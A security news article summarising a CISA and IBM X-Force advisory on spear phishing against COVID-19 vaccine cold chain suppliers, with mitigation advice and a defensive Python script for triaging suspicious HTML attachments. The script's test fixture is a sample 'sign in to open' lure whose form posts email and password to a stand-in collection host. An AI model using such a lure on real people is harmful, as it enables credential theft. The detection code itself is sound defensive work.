Advisory on Global Phishing Campaigns Targeting COVID-19 Vaccine Cold Chain Companies

The Cybersecurity and Infrastructure Security Agency (CISA) has published a warning regarding a worldwide spear phishing campaign directed at companies that supply cold storage and are engaged in COVID-19 vaccine distribution.

The first two vaccines developed must be stored and transported at low temperatures before they are administered. The Pfizer/BioNTech vaccine must be stored at -94°F (-70°C), while the Moderna vaccine must be stored at -4°F (-20°C). Cold chain suppliers are therefore an important component of the supply chain.

At the beginning of the pandemic, IBM X-Force organized a cyber threat task force to monitor threats directed at companies engaged in the fight against COVID-19. The task force recently shared a report on an ongoing spear phishing campaign that began in September 2020 and targets companies involved in the Cold Chain Equipment Optimization Platform program. The United Nations Children's Fund and partner agencies introduced the program in 2015 to deliver vaccines around the world.

Phishing emails were sent to managers in sales, purchasing, finance, and information technology who are likely engaged in work supporting the vaccine cold chain. The targeted companies are believed to be suppliers of the material resources needed to meet the transport requirements of the COVID-19 cold chain.

The phishing emails appear to come from an account manager at Haier Biomedical, a Chinese certified supplier to the Cold Chain Equipment Optimization Platform program. Haier Biomedical is the only company in the world that offers end-to-end cold chain services, which is why it is being impersonated in the phishing campaign.

The IBM X-Force researchers intercepted emails carrying malicious HTML attachments that, when opened, prompt the recipient to enter their credentials in order to view the file. The harvested credentials are then used to spy on internal communications about the processes, methods, and projects for delivering COVID-19 vaccines. Once the attackers hold valid credentials, they can move laterally through connected systems, conduct cyber surveillance, and steal further data for use in other attacks.
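A mail gateway or analyst can triage an HTML attachment of the kind described above before it reaches a mailbox. The following is an added example, not code from the IBM X-Force or CISA report; it uses only the Python standard library, and the sample attachment and the sender domain `example.com` are constructed assumptions.

```python
"""Heuristic triage of an HTML email attachment for credential-harvesting traits."""
from html.parser import HTMLParser
from urllib.parse import urlparse


class _FormScanner(HTMLParser):
    """Collect form actions, password inputs and script tags from HTML text."""

    def __init__(self):
        super().__init__()
        self.form_actions = []   # value of each <form action="...">
        self.password_fields = 0  # count of <input type="password">
        self.scripts = 0          # count of <script> tags

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1
        elif tag == "script":
            self.scripts += 1


def triage_attachment(html, sender_domain):
    """Return findings for one HTML attachment; 'flag' is True when it looks like a lure.

    A file attached to an email has no legitimate reason to ask for a password,
    so any password field is a red flag. Form actions that post to a host other
    than the sender's domain (or to any remote host) show where credentials go.
    """
    scanner = _FormScanner()
    scanner.feed(html)
    external_hosts = []
    for action in scanner.form_actions:
        host = urlparse(action).hostname
        if host and not host.endswith(sender_domain):
            external_hosts.append(host)
    flag = scanner.password_fields > 0 and (bool(external_hosts) or scanner.scripts > 0)
    return {
        "password_fields": scanner.password_fields,
        "external_form_hosts": external_hosts,
        "scripts": scanner.scripts,
        "flag": flag,
    }


# Constructed sample attachment that mimics a "sign in to open the document" lure.
SAMPLE_ATTACHMENT = """<html><body>
<p>This document is protected. Sign in with your email account to view it.</p>
<form method="post" action="https://example.invalid/collect.php">
  <input type="text" name="email">
  <input type="password" name="passwd">
  <input type="submit" value="Open">
</form></body></html>"""
```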

IBM stated that the phishing campaign is running in 6 countries and that, to date, 10 international organizations have been targeted, including the European Commission's Directorate-General for Taxation and Customs Union. The targeted organizations belong to varied industry sectors such as manufacturing, energy, information technology and software. The researchers could not confirm how successful the campaigns were.

Given the precise targeting of executives at particular global companies engaged in vaccine storage and transportation, and the absence of a clear path to cashing out, the campaign is probably being carried out by a nation-state threat actor. IBM X-Force suggests that cybercriminal groups would be unlikely to invest the time, funds, and resources required for campaigns targeting so many global companies.

IBM X-Force advises companies engaged in the cold storage and transportation chain to take measures to mitigate the phishing threat, such as developing and testing incident response plans, sharing and consuming threat intelligence, assessing their third-party ecosystems, adopting a zero-trust approach to security, deploying multi-factor authentication throughout the company, using endpoint detection and response solutions, and conducting regular email security awareness training.

Besides the phishing threat, companies engaged in the cold storage chain should also put protections in place against ransomware attacks, since they are a likely target at any time. In November, the U.S.-based cold storage firm Americold Realty Trust suffered a cyberattack believed to have involved ransomware. The firm was reported to have been asked by Chicago Rockford International Airport for assistance with COVID-19 vaccine distribution.